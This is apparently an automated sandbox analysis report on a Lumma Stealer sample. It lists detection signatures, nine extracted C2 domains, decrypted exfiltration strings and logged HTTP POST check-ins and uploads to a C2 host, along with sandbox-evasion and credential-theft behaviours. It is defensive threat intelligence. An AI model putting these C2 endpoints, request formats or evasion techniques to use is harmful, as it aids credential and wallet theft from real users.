Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0gnHF2twcT.exe

Overview

General Information

Sample name:0gnHF2twcT.exe
renamed because original name is a hash value
Original sample name:85bfde4071d80bb2bdffb80f68d54d17.exe
Analysis ID:1579668
MD5:85bfde4071d80bb2bdffb80f68d54d17
SHA1:d5f0c8caf84adc02892f6a3c2cbeeacca1379be5
SHA256:945cc86dc25c7ac098e62ada6086c71aba93c5c9522076a0ed7923833cf5becb
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 0gnHF2twcT.exe (PID: 1464 cmdline: "C:\Users\user\Desktop\0gnHF2twcT.exe" MD5: 85BFDE4071D80BB2BDFFB80F68D54D17)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "necklacebudi.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 0gnHF2twcT.exe PID: 1464JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: 0gnHF2twcT.exe PID: 1464JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:43.081330+010020283713Unknown Traffic192.168.2.84970423.55.153.106443TCP
                2024-12-23T07:18:45.487204+010020283713Unknown Traffic192.168.2.849705104.21.66.86443TCP
                2024-12-23T07:18:47.484626+010020283713Unknown Traffic192.168.2.849706104.21.66.86443TCP
                2024-12-23T07:18:50.240976+010020283713Unknown Traffic192.168.2.849707104.21.66.86443TCP
                2024-12-23T07:18:52.321059+010020283713Unknown Traffic192.168.2.849708104.21.66.86443TCP
                2024-12-23T07:18:54.904598+010020283713Unknown Traffic192.168.2.849710104.21.66.86443TCP
                2024-12-23T07:18:57.514355+010020283713Unknown Traffic192.168.2.849713104.21.66.86443TCP
                2024-12-23T07:19:00.687761+010020283713Unknown Traffic192.168.2.849714104.21.66.86443TCP
                2024-12-23T07:19:03.935119+010020283713Unknown Traffic192.168.2.849715104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:46.235451+010020546531A Network Trojan was detected192.168.2.849705104.21.66.86443TCP
                2024-12-23T07:18:48.533135+010020546531A Network Trojan was detected192.168.2.849706104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:46.235451+010020498361A Network Trojan was detected192.168.2.849705104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:48.533135+010020498121A Network Trojan was detected192.168.2.849706104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:40.855062+010020583541Domain Observed Used for C2 Detected192.168.2.8600101.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:41.223179+010020583581Domain Observed Used for C2 Detected192.168.2.8576271.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:40.337317+010020583601Domain Observed Used for C2 Detected192.168.2.8620611.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:40.622145+010020583621Domain Observed Used for C2 Detected192.168.2.8495001.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:40.115629+010020583641Domain Observed Used for C2 Detected192.168.2.8592761.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:40.479723+010020583701Domain Observed Used for C2 Detected192.168.2.8595701.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:41.363940+010020583741Domain Observed Used for C2 Detected192.168.2.8618581.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:40.998287+010020583761Domain Observed Used for C2 Detected192.168.2.8650501.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:39.971144+010020583781Domain Observed Used for C2 Detected192.168.2.8561521.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:58.302029+010020480941Malware Command and Control Activity Detected192.168.2.849713104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T07:18:43.856230+010028586661Domain Observed Used for C2 Detected192.168.2.84970423.55.153.106443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0gnHF2twcT.exeAvira: detected
                Source: 0gnHF2twcT.exe.1464.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "necklacebudi.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
                Source: 0gnHF2twcT.exeReversingLabs: Detection: 57%
                Source: 0gnHF2twcT.exeVirustotal: Detection: 54%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0gnHF2twcT.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: 0gnHF2twcT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: number of queries: 1001
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:59276 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.8:56152 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.8:57627 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.8:65050 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.8:59570 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.8:49500 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:61858 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.8:62061 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.8:60010 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49713 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.66.86:443
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZKXX8IDAOM1N3IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12822Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KR0VE528KXPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15033Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RW4EII7M5UG7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20206Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=90K0SFJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1170Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=08RS2QQ5TDI6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588250Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=16219b16eba2e1d25c63a86f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:18:43 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-srFc equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
